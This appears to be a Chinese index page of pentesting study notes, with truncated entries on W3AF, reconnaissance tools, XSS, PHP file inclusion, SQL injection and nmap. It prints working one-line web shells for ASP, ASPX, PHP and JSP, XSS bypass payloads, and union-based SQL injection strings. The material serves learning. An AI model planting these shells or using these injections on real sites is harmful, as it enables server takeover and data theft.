W3AF简单应用
WGF是一个we应用安全的攻击、审计平台,通过增加插件来对功能进行扩展。这是一款用python写的工具,可以查看所有源代码。支持GUL,也支持命令行模式。
本框架拥有三种类型的插件:漏洞挖掘挖掘(discowe ry)、漏洞分析(aunit)和漏洞攻击(attack)。漏洞挖掘插件只负责一件事情:搜寻新的URL、表单和其它注入点(injection points)。Web spider便是一个经典的漏洞挖掘插件。这个插件以一个URL为输入,然后得到一个或多个注入点。当用户使用多个这种类型的插件时,这些插件会运行这样的循环:如果插件A在第一次运行时发现了一个新的URlL,w3af内核将这个urL传递给插件B。如果插件b发现了一个新的URL,它也将被发送给插件A。这个过程将一直持续下去,所有的插件都将运行工作,占用应用资源,直到无法运行漏洞挖掘应用。
漏洞分析插件则获取那些漏洞挖掘插件找到的注入点,为了发现漏洞,混洞分析插件会向所有可注入点发送特别设计的数据。例如使用一个漏洞分析插件来获取SQL注入的漏洞。漏涓攻击插件的作用是利用分析插件发现的漏洞。它们通常会得到一个远程服务器的shell ...
信息搜集
whois信息
子域名收集
端口信息收集
旁站、C段查询
目录扫描
CMS指纹识别
网站架构
整站分析:服务器系统类型、网站容器(Apache、NGINX、IIS、Tomcat)、脚本类型(jsp、asp、php)、数据库类型(mysql、Oracle、access)
地理位置查询
常用工具:
地理位置查询:
IP查询_专业精准的IP库服务商_IPIP
whois:
kali下的whois
https://www.chinaz.com/
站长之家http://whois.chinaz.com/
域名注册人收集:
https://www.chinaz.com/
子域名爆破:
https://www.zoomeye.org/钟馗之眼
https://chaziyu.com/查子域
域名挖掘机Layer
子域名枚举https://github.com/lijiejie/subDomainsBrute
https://www.52pojie.cn/forum.php?mod=viewthread&tid=894555&highlight=%D7%D3%D3%F2%C3%FB
ssl证书查询:
...
三种XSS
存储型:攻击者在页面上插入XSS代码,服务端将数据存入数据库,当用户访问到存在XSS漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致XSS代码执行,达到攻击效果。
反射型:攻击者在URL中插入XSS代码,服务端将URL中的XSS代码输出到页面上,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
dom:攻击者在URL中插入XSS代码,前端页面直接从URL中获取XSS代码并且输出到页面,导致XSS代码的执行,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
alert("trick or treat!")
12/**<script>alert(1)</script> "><a href="javascript:alert(1)">alert</a> <"
大小写
双写
编码
修改type=”hidden”为button
鼠标事件(onclick=alert(1))
浅谈XSS攻击的那些事(附常用绕过姿势) - 知乎 ( ...
文件包含漏洞
include_once()如果该文件中的代码已经被包含了,则不会再次包含
include与require区别:
如果有错误,include会继续执行后面的。require则会停止
highlight_file() 函数对文件进行 PHP 语法高亮显示
PHP里用点拼接
PHP中addslashes函数是把单引号、双引号、反斜杠前添加反斜杠
file://—访问本地文件系统
http://—访问HTTP URL
ftp://—访问FTP URL
php://—访问各种I / O流
zlib://—压缩流
data://—数据(RFC 2397)
glob://—查找匹配模式的路径名
phar://— PHP存档
ssh2://—安全外壳2
rar://— RAR
ogg://—音频流
Expect://—流程交互流
能够打开并包含本地文 ...
常见的MIME类型
常见的白名单MIME TYPE扩展名 MIME TYPEjpg image/jpegpng image/pngtxt text/plainzip application/zipdoc application/msword
文件后缀
Mime类型
说明
.flv
flv/flv-flash
在线播放
.html或.htm
text/html
超文本标记语言文本
.rtf
application/rtf
RTF文本
.gif
image/gif
GIF图形
.jpeg或.jpg
image/jpeg
JPEG图形
.au
audio/basic
au声音文件
.mid或.midi
audio/midi或audio/x-midi
MIDI音乐文件
.ra或.ram或.rm
audio/x-pn-realaudio
RealAudio音乐文件
.mpg或.mpeg或.mp3
video/mpeg
MPE ...
常见的一句话木马
1234567asp一句话木马: <%execute(request("value"))%> php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马:<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>
例:
12345678ASP:<%eval request("pass")%> ASPX:<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%> PHP:<?php eval(@$_POST['a']);?>JSP:<%Runtime.getRuntime().exec(request.getParamet ...
HTTP头
If-Modified-Since:记录页面的最后修改时间。当客户端访问页面时,服务器会将页面最后修改时间通过 Last-Modified 标识由服务器发往客户端,客户端记录修改时间,再次请求本地存在的cache页面时,客户端会通过 If-Modified-Since 头将先前服务器端发过来的最后修改时间戳发送回去,服务器端通过这个时间戳判断客户端的页面是否是最新的,如果不是最新的,则返回新的内容,如果是最新的,则 返回 304 告诉客户端其本地 cache 的页面是最新的,于是客户端就可以直接从本地加载页面了,这样在网络上传输的数据就会大大减少,同时也减轻了服务器的负担。
[Cache-Control max-age=0]:Cache-Control no-cache — 强制每次请求直接发送给源服务器,而不经过本地缓存版本的校验。这对于需要确认认证应用很有用(可以和public结合使用),或者严格要求使用最新数据 的应用(不惜牺牲使用缓存的所有好处)
Pragma 当”no-cache”出现在请求消息中时,应用程序应当向原始服务器推送此请求,即使它已经在上次请求时已经缓 ...
ESXI安装CentOS7无IP的解决方案
第一步:打开ens33网卡的配置: vi /etc/sysconfig/network-scripts/ifcfg-ens33
第二步:把ONBOOT=no改成ONBOOT=yes
第三步:然后重启网络服务: sudo service network restart
Sql注入
Svstem user()系统用户名user()用户名
current_user()当前用户名session_user()连接数据库的用户名database()数据库名version()数据库版本@@datadir数据库路径@basedir数据库安装路径@version comoile os操作系统count()返回执行结果数量
使用?id=’ union select ‘null’,’null’,’null’,’null# 判断列数,发现有四列
4、查看回显位置:?id=’ union select ‘1’,’2’,’3’,’4
5、?id=’ union select ‘1’,database(),user(),’4
查询表:?id=’ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() and ‘1’=’1
7、查询字段:?id=’ union selec ...
Nmap笔记
nmap是一款开源、免费的网络探测、安全审计的工具。
nmap扫描原理:首先判断nmap输入的命令行中是否包含域名,如果包含需要利用DNS服务器进行域名解析,然后发送ICMP Echo Request来探测主机存活性,根据返回的数据表来得到机器信息
使用指定dns服务器: –dns-servers 8.8.8.8 www.baidu.com
对于已知主机存活或者防火墙的机器,可以使用-Pn参数停止之前的ICMP请求打到不触发防火墙安全机制
端口状态:
open表示端口处于开放状态
closed 表示端口处于关闭状态;Filterd 表示端口处于过滤无法收到返回的probe状态;
UnFilterd 表示端口收到返回的probe,但是无法确认;-
opend/UnFilterd 表示端口处于开放或者是过滤状态;
closed/UnFilterd 表示端口处于关闭或著未过滤状态。
-h:查看自带的帮助信息
nmap参数设置:nmap
扫描单个目标机器
扫端口:nmap 192.168.1.1
tcp全扫描,与目标进行三次握手:nmap -sT 192.168.1.3
使 ...
